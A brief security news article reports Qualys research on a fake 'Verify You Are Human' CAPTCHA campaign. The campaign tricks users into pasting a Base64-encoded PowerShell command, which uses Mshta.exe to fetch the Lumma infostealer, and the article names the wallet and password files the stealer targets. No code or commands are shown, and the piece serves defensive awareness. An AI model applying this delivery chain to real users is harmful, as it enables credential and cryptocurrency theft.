This post is also available in:
עברית (Hebrew)
Researchers at Qualys have recently uncovered a sophisticated malicious campaign that exploits CAPTCHA verification mechanisms to deliver malware. In this attack, cybercriminals prompt users to “Verify You Are Human” through a deceptive process that ultimately leads to the execution of malicious commands on their systems.
The method involves redirecting unsuspecting users to fake CAPTCHA sites, often by exploiting vulnerabilities in legitimate software or public-facing applications. Once users click the “I’m not a robot” button, they are presented with seemingly harmless verification steps. However, this process is a clever ruse: it automatically copies a malicious script to the clipboard and prompts users to paste it into a terminal window. What appears to be a simple verification procedure is actually an execution chain that triggers a PowerShell command, allowing the Lumma infostealer to be downloaded.
This unique approach makes the threat particularly insidious, as it can operate stealthily and persistently on compromised systems. The Lumma infostealer is highly effective at collecting sensitive data, including passwords, cryptocurrency wallets, and other confidential information. It specifically targets files with names indicative of valuable data, such as those containing keywords like seed.txt, pass.txt, and wallet.txt, which are often associated with cryptocurrency and password management.
To obfuscate its malicious intent, the attack employs Base64 encoding for the scripts, complicating detection efforts. Furthermore, attackers utilize trusted Windows tools like Mshta.exe to download the payload, making it harder for security systems to identify the threat. The Lumma infostealer has gained notoriety as a malware-as-a-service, frequently adapting its delivery methods, including past attacks via fake error messages and compromised accounts.
Qualys urges organizations and individuals to employ robust endpoint detection and response tools to counteract these sophisticated attacks. Given that the malware and its command-and-control servers are often hosted on legitimate Content Delivery Networks (CDNs), such as Cloudflare, the ground for cyber threats continues to evolve. As attackers become increasingly innovative, heightened vigilance and advanced security measures are crucial for safeguarding sensitive data against these emerging threats.
